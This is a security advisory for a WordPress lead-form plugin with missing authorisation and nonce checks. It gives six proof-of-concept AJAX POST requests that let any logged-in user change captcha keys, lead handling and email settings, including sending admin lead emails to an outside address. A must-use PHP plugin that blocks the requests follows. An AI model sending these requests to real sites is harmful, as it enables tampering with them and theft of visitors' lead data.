The plugin lacks authorisation and nonce checks, which could allow any authenticated user, such as a subscriber, to update and change various settings.

PoC POST Request (ON/OFF Captcha):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption

PoC POST Request (Captcha Settings: Site Key & Secret Key):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings

PoC POST Request (Lead Receiving Method):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings

PoC POST Request (User Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings

PoC POST Request (Admin Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings

PoC POST Request (Remember this Form):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm
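
Compensating control for the six AJAX actions shown in the requests above, as an added example that is not the plugin's code or the vendor's fix: a must-use plugin that rejects these actions for users without an administrative capability and logs the attempt. The file name, the lfg_ prefix and the choice of manage_options as the required capability are assumptions.

```php
<?php
/**
 * Plugin Name: AJAX settings guard (added example, hypothetical name)
 * Install as wp-content/mu-plugins/lfg-ajax-guard.php (hypothetical path).
 */

// Action names copied from the PoC requests in this advisory.
const LFG_GUARDED_ACTIONS = array(
    'SaveCaptchaOption',
    'SaveCaptchaSettings',
    'SaveLeadSettings',
    'SaveUserEmailSettings',
    'SaveEmailSettings',
    'RememberMeThisForm',
);

// Assumption: only administrators should be able to change these settings.
const LFG_REQUIRED_CAP = 'manage_options';

/**
 * Runs before the plugin's own handler. Privileged users fall through;
 * everyone else gets a 403 JSON response and the request ends here.
 */
function lfg_deny_unprivileged() {
    if ( current_user_can( LFG_REQUIRED_CAP ) ) {
        return;
    }

    // Record the blocked attempt so it can be picked up from the PHP error log.
    error_log( sprintf(
        'lfg-guard: blocked %s for user_id=%d ip=%s',
        current_action(),
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
    ) );

    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 ); // sends JSON and exits
}

// Lowest possible priority value so the guard runs ahead of any handler
// the plugin registered on the same hook.
foreach ( LFG_GUARDED_ACTIONS as $lfg_action ) {
    add_action( "wp_ajax_{$lfg_action}", 'lfg_deny_unprivileged', PHP_INT_MIN );
}

// This covers the missing authorisation check only. The missing nonce check
// (CSRF against a logged-in administrator) has to be fixed in the plugin:
// its handlers need check_ajax_referer() and its forms need to send the nonce.
```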